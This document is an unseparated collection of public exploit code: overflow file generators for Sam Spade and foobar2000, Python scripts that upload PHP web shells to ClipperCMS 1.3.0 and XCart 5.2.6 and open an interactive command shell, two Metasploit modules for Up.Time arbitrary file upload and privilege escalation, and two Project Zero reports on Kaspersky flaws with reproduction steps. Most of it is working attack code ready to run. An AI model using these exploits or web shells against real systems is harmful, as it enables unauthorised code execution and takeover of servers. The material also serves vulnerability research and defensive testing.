f = open("sam_spade_browse_url.txt", "w")
Junk = "A"* 496
eip_overwrite = "\xaf\xbe\xad\xde"
f.write(Junk+eip_overwrite)
f.close()
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
def login(requestSession, url, username, password):
postData = {"ajax": "1", "username": username, "password": password}
return requestSession.post(url, data = postData, headers = {"referer": url})
def getFullPath(requestSession, url):
request = requestSession.get(url, headers = {"referer": url})
if "You don't have enough privileges" in request.text:
return "cant upload"
fullPath = re.search("var current_path = '(.*)';", request.text)
return fullPath.group(1)
def upload(requestSession, url, fileName, fileContent, postData):
filesData = {"userfile[0]": (fileName, fileContent)}
return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
def workingShell(url, fullPath):
return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
exit("ERROR: Incorrect username or password")
else:
print("successful: login as " + username)
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
exit("ERROR: user does not have required privileges")
else:
print("successful: user is allowed to use file manager. Full path: " + fullPath)
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload .htaccess file")
else:
print("successful: .htaccess upload")
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload shell")
else:
print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
if workingShell(url + "404.png?x=", fullPath):
print("successful: shell seems to be working")
else:
exit("ERROR: shell does not seem to be working correctly")
runShell(url + "404.png?x=")
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
#!/usr/local/bin/python
# Exploit for XCart 5.2.6 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ admin@example.com admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/admin.php?target=login"
fileManagerPath = "/admin.php?target=logo_favicon"
shellFileName = "404.php"
shellContent = "GIF89a;<?php passthru($_GET['x']); ?>"
def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password}
loginResult = requestSession.post(url, data = postData).text
return "Invalid login or password" not in loginResult
def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('SimpleCMS" />\n<input type="hidden" name="xcart_form_id" value="(.*)" />', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
filesData = {"logo": (fileName, fileContent)}
postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken}
uploadResult = requestSession.post(url, files = filesData, data = postData)
return "The data has been saved successfully" in uploadResult.text
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text.replace("GIF89a;", ""))
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")
if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
print("successful: file uploaded")
else:
exit("ERROR: could not upload file")
runShell(url + shellFileName + "?x=")
Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly
mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use
exploits/multi/http/uptime_file_upload_2.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.0/7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.
The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
by the vendor.
Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
can still be bypassed and gain privilege escalation, and allows the attacker to upload file
again, and execute arbitrary commands.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
],
'References' =>
[
['EDB', '37888'],
['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => 'true',
'DefaultTarget' => 0,
# The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
# it was discovered again by Ewerson 'Crash' Guimaraes.
'DisclosureDate' => 'Nov 18 2013'
))
register_options(
[
Opt::RPORT(9999),
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
], self.class)
register_advanced_options(
[
OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
], self.class)
end
def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_error(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_good(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
# Application Check
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
vprint_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
n = Nokogiri::HTML(res.body)
uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')
if uptime_text
version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
vprint_status("Found version: #{version}")
if version >= '7.4.0' && version <= '7.5.0'
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def create_exec_service(*args)
cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
res_service = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'section' => 'ERDCInstance',
'subsection' => 'add',
},
'vars_post' => {
'initialERDCId' => '20',
'target' => '1',
'targetType' => 'systemList',
'systemList' => '1',
'serviceGroupList' => '-10',
'initialMode' => 'standard',
'erdcName' => 'Exploit',
'erdcInitialName' => '',
'erdcDescription' => 'Exploit',
'hostButton' => 'system',
'erdc_id' => '20',
'forceReload' => '0',
'operation' => 'standard',
'erdc_instance_id' => '',
'label_[184]' => 'Script Name',
'value_[184]' => cmd,
'id_[184]' => 'process',
'name_[process]' => '184',
'units_[184]' => '',
'guiBasic_[184]' => '1',
'inputType_[184]' => 'GUIString',
'screenOrder_[184]' => '1',
'parmType_[184]' => '1',
'label_[185]' => 'Arguments',
'value_[185]' => cmdargs,
'id_[185]' => 'args',
'name_[args]' => '185',
'units_[185]' => '',
'guiBasic_[185]' => '1',
'inputType_[185]' => 'GUIString',
'screenOrder_[185]' => '2',
'parmType_[185]' => '1',
'label_[187]' => 'Output',
'can_retain_[187]' => 'false',
'comparisonWarn_[187]' => '-1',
'comparison_[187]' => '-1',
'id_[187]' => 'value_critical_output',
'name_[output]' => '187',
'units_[187]' => '',
'guiBasic_[187]' => '1',
'inputType_[187]' => 'GUIString',
'screenOrder_[187]' => '4',
'parmType_[187]' => '2',
'label_[189]' => 'Response time',
'can_retain_[189]' => 'false',
'comparisonWarn_[189]' => '-1',
'comparison_[189]' => '-1',
'id_[189]' => 'value_critical_timer',
'name_[timer]' => '189',
'units_[189]' => 'ms',
'guiBasic_[189]' => '0',
'inputType_[189]' => 'GUIInteger',
'screenOrder_[189]' => '6',
'parmType_[189]' => '2',
'timing_[erdc_instance_monitored]' => '1',
'timing_[timeout]' => '60',
'timing_[check_interval]' => '10',
'timing_[recheck_interval]' => '1',
'timing_[max_rechecks]' => '3',
'alerting_[notification]' => '1',
'alerting_[alert_interval]' => '120',
'alerting_[alert_on_critical]' => '1',
'alerting_[alert_on_warning]' => '1',
'alerting_[alert_on_recovery]' => '1',
'alerting_[alert_on_unknown]' => '1',
'time_period_id' => '1',
'pageFinish' => 'Finish',
'pageContinue' => 'Continue...',
'isWizard' => '1',
'wizardPage' => '2',
'wizardNumPages' => '2',
'wizardTask' => 'pageFinish',
'visitedPage[1]' => '1',
'visitedPage[2]' => '1'
})
end
def exploit
vprint_status('Trying to login...')
# Application Login
res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while trying to login')
end
# Check OS
phpfile_name = rand_text_alpha(10)
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Found Linux installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
cmd = phppath
else
vprint_status('Found Windows installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
cmd = datastore['CmdPath']
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
end
if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Login success')
# Privilege escalation getting user ID
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'page' => 'Users',
'subPage' => 'UserContainer'
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)
unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
end
matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
unless matchdata
fail_with(Failure::Unknown, 'Unable to find userID for escalation')
end
get_id = matchdata[0].gsub(/[^\d]/, '')
vprint_status('Escalating privileges...')
# Privilege escalation post
res_priv_elev = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'section' => 'UserContainer',
'subsection' => 'edit',
'id' => "#{get_id}"
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'operation' => 'submit',
'disableEditOfUsernameRoleGroup' => 'false',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'passwordConfirm' => datastore['PASSWORD'],
'firstname' => rand_text_alpha(10),
'lastname' => rand_text_alpha(10),
'location' => '',
'emailaddress' => '',
'emailtimeperiodid' => '1',
'phonenumber' => '',
'phonenumbertimeperiodid' => '1',
'windowshost' => '',
'windowsworkgroup' => '',
'windowspopuptimeperiodid' => '1',
'landingpage' => 'MyPortal',
'isonvacation' => '0',
'receivealerts' => '0',
'activexgraphs' => '0',
'newuser' => 'on',
'newuser' => '1',
'userroleid' => '1',
'usergroupid[]' => '1'
}
)
unless res_priv_elev
fail_with(Failure::Unknown, 'Connection timed out while escalating...')
end
# Refresing perms
vprint_status('Refreshing perms...')
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)
unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
end
res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
end
if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Priv. Escalation success')
end
# CREATING Linux EXEC Service
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Creating Linux Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
else
# CREATING Windows EXEC Service#
vprint_status('Creating Windows Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
end
# Upload file
vprint_status('Uploading file...')
up_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
'vars_post' => {
'file_name' => "#{phpfile_name}.txt",
'script' => payload.encoded
}
)
unless up_res
fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
end
vprint_status('Checking Uploaded file...')
res_up_check = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
)
if res_up_check && res_up_check.code == 200
print_good("File found: #{phpfile_name}")
else
print_error('File not found')
return
end
# Get Monitor ID
vprint_status('Fetching Monitor ID...')
res_mon_id = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
'iDisplayStart' => '0',
'iDisplayLength' => '10',
'sSearch' => 'Exploit'
}
)
unless res_mon_id
fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
end
matchdata = res_mon_id.body.match(/id=?[^>]*>/)
unless matchdata
fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
end
mon_get_id = matchdata[0].gsub(/[^\d]/, '')
print_good("Monitor id aquired:#{mon_get_id}")
# Executing monitor
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'section' => 'RunERDCInstance',
'subsection' => 'view',
'id' => mon_get_id,
'name' => 'Exploit'
}
)
else
print_error('Cookie not found')
end
end
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=539
When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.
I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.
Here is how to generate a certificate to reproduce:
$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:
Then test start a server like this:
$ openssl s_server -key key.pem -cert cert.pem -accept 8080
And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.
Source: https://code.google.com/p/google-security-research/issues/detail?id=529
The attached testcase was found by fuzzing DEX files, and results in a heap overflow with a wild memcpy. Note that Kaspersky catch exceptions and continue execution, so running into unmapped pages doesn't terminate the process, this should make exploitation quite realistic.
(bb8.ac0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0b2074 ebx=ffffffff ecx=3ffd419c edx=00000003 esi=0c161a01 edi=0c170000
eip=72165157 esp=046ceed8 ebp=046ceee0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
avengine_dll!ekaGetObjectFactory+0x51537:
72165157 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:023> dd edi
0c170000 ???????? ???????? ???????? ????????
0c170010 ???????? ???????? ???????? ????????
0c170020 ???????? ???????? ???????? ????????
0c170030 ???????? ???????? ???????? ????????
0c170040 ???????? ???????? ???????? ????????
0c170050 ???????? ???????? ???????? ????????
0c170060 ???????? ???????? ???????? ????????
0c170070 ???????? ???????? ???????? ????????
0:023> dd esi
0c161a01 00000000 00000000 00000000 00000000
0c161a11 00000000 00000000 00000000 00000000
0c161a21 00000000 00000000 00000000 00000000
0c161a31 00000000 00000000 00000000 00000000
0c161a41 00000000 00000000 00000000 00000000
0c161a51 00000000 00000000 00000000 00000000
0c161a61 00000000 00000000 00000000 00000000
0c161a71 00000000 00000000 00000000 00000000
0:023> kvn1
# ChildEBP RetAddr Args to Child
00 046ceee0 15c01af7 0c0c0674 0c0b2075 ffffffff avengine_dll!ekaGetObjectFactory+0x51537
This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38735.zip
# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
# Instructions: Create playlist.asx:
# <asx version="3.0">
# <title>Example.com Live Stream</title>
#
# <entry>
# <title>Short Announcement to Play Before Main Stream</title>
# <ref href="http://example.com/announcement.wma" />
# <param name="aParameterName" value="aParameterValue" />
# </entry>
#
# <entry>
# <title>Example radio</title>
# <ref href="http://example.com" />
# <author>Example.com</author>
# <copyright>example.com</copyright>
# </entry>
# </asx>
import os
import shutil
evil = 'A' * 256
shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')
file = open('Local_Crash_PoC.asx','r')
file_data = file.read()
file.close()
file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
file = open('Local_Crash_PoC.asx','w')
file.write(file_new_data)
file.close()